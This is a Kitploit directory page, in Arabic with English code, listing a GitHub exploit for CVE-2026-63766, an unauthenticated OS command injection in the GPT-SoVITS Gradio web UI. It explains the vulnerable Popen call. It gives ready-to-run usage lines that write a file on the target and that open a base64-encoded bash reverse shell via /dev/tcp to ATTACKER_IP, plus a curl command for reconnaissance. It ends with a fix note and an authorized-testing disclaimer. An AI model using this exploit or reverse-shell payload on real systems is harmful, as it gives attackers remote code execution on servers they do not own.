Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-63766_exploit — استغلال حقن أوامر نظام التشغيل غير المُوثَّق لواجهة GPT-SoVITS Gradio على الويب. يُوصِّل تنفيذ الأوامر عن بُعد (RCE) عبر معاملات مسار غير مُنقَّحة في مساعدات معالجة الصوت، مع دعم الصدفات العكسية وكتابة الملفات لاختبارات الأمان المصرح بها. | Kitploit
أدوات/GitHubGitHub/0xdak/cve-2026-63766_exploit
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالتعلم والتعليم
GitHub0xdak/cve-2026-63766_exploit

CVE-2026-63766_exploit

استغلال حقن أوامر نظام التشغيل غير المُوثَّق لواجهة GPT-SoVITS Gradio على الويب. يُوصِّل تنفيذ الأوامر عن بُعد (RCE) عبر معاملات مسار غير مُنقَّحة في مساعدات معالجة الصوت، مع دعم الصدفات العكسية وكتابة الملفات لاختبارات الأمان المصرح بها.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 27 أياملم تتم المراجعة بعد

CVE-2026-63766 — GPT-SoVITS حقن أوامر نظام التشغيل بدون مصادقة

تنفيذ كود عن بُعد بدون مصادقة في GPT-SoVITS's Gradio واجهة الويب (webui.py).

المساعدات الصوتية (open_asr, open_slice, open_denoise, open_uvr5) تقوم بتضمين قيم المسار غير المنقحة من مربع نص Gradio مباشرة في أوامر شل تُنفذ مع Popen(..., shell=True). المسارات تمر فقط عبر clean_path()، الذي يزيل فقط علامات الاقتباس والمسافات البادئة/النهائية — الأحرف الأولية للشل في الوسط تبقى. حقل asr_opt_dir لا يتم حتى التحقق من وجوده، لذا فإن استبدال الأمر $(...) داخله يقع داخل -o "$(...)" ويُشغّل كمستخدم عملية واجهة الويب. واجهة الويب تُصدر بدون مصادقة، لذا يكفي طلب واحد.

  • المتأثر: GPT-SoVITS <= 20250606v2pro
  • المنفذ الافتراضي: 9874 (واجهة Gradio ويب، بدون مصادقة)
  • CWE: 78 (حقن أوامر نظام التشغيل)
  • التأثير: تنفيذ كود عشوائي كمستخدم عملية واجهة الويب

المتطلبات

root@kitploit:~
pip install gradio_client

الاستخدام

root@kitploit:~
# write proof to a file on the target
python3 exploit.py http://10.10.10.10:9874/ -c 'id > /tmp/pwned 2>&1'

# reverse shell (base64 keeps the payload quote-free inside the $() context;
# bash -c is needed because the sink runs under /bin/sh, which lacks /dev/tcp)
B64=$(echo -n 'bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1' | base64 -w0)
python3 exploit.py http://10.10.10.10:9874/ -c "echo $B64|base64 -d|bash"

الأمر المُحقون يُنفذ على الخادم؛ مخرجاته لا تُعاد، لذا استخدم شل عكسية (أو اكتب في مسار قابل للقراءة) لرؤية النتيجة. asr_opt_dir مُغلف في $(...)، لذا يُنفذ عبر استبدال الأمر بغض النظر عن تثبيت أي نموذج ASR.

كيف يعمل

open_asr يبني وينفذ:

root@kitploit:~
asr_opt_dir = clean_path(asr_opt_dir)          # only strips leading/trailing quotes/spaces
cmd += f' -o "{asr_opt_dir}"'                   # asr_opt_dir NOT existence-checked
Popen(cmd, shell=True)                          # /bin/sh runs $(...) inside the -o "..."

تحديد الهدف

واجهة Gradio تكشف سطح API الخاص بها عند /config:

root@kitploit:~
curl -s http://10.10.10.10:9874/config | python3 -c "import sys,json;print([x['api_name'] for x in json.load(sys.stdin)['dependencies'] if x.get('api_name')][:12])"
# [... 'open_asr', 'close_asr', 'open_slice', ...]

الإصلاح

قم بالترقية بعد GPT-SoVITS 20250606v2pro، ولا تعرض أبدًا واجهة الويب لشبكات غير موثوقة، ولا تشغّلها كمستخدم مميز.

إخلاء مسؤولية

لأغراض الاختبار الأمني المصرح به والتعليم فقط. استخدمه فقط ضد أنظمة تمتلكها أو لديك إذن صريح لاختبارها.

تنزيل الأداة